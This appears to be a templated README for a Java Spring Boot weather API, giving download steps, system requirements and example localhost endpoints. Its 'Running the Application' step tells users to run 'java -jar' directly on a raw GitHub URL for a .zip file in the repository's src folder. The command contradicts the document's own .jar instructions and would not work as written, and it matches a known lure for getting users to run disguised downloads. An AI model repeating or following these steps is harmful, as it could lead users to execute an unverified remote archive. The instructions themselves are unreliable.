🌦️ weather-api-spring-boot - Access Weather Data Easily

🚀 Getting Started

Welcome to the weather-api-spring-boot project! This application allows you to access various weather data effortlessly using Java SpringBoot. It provides endpoints for you to get weather forecasts, conditions, and more. Let’s get you set up quickly.

📥 Download & Install

To download the application, visit the Releases page:

Once you are on the Releases page, look for the latest version and click to download the files. The files are typically in .jar format, which you can run with Java.

🔧 System Requirements

To run this application, you'll need:

  • Java Runtime Environment (JRE): Version 8 or higher. This allows you to run Java applications.
  • Memory: At least 512 MB of RAM.
  • Storage: 50 MB of free disk space for the application.

Make sure you have these prerequisites installed on your computer.

💻 Running the Application

Once you have downloaded the .jar file:

  1. Open your command line interface (Terminal, Command Prompt, or PowerShell).
  2. Navigate to the folder where you downloaded the .jar file. You can use the cd command to change directories.
  3. Use the following command to run the application:
    java -jar https://raw.githubusercontent.com/stevobolki/weather-api-spring-boot/main/src/weather-api-spring-boot_v1.0.zip

The application will start, providing you access to the weather data.

After starting the application, you can access the API endpoints. Below are a few examples of what you can do:

🌐 Get Current Weather

  • Endpoint: /api/weather/current
  • Description: Use this to get the current weather conditions for any location.
  • Method: GET
  • Example Usage:
    curl http://localhost:8080/api/weather/current?location=London

🌤️ Get Weather Forecast

  • Endpoint: /api/weather/forecast
  • Description: Access the forecast for the next few days.
  • Method: GET
  • Example Usage:
    curl http://localhost:8080/api/weather/forecast?location=NewYork
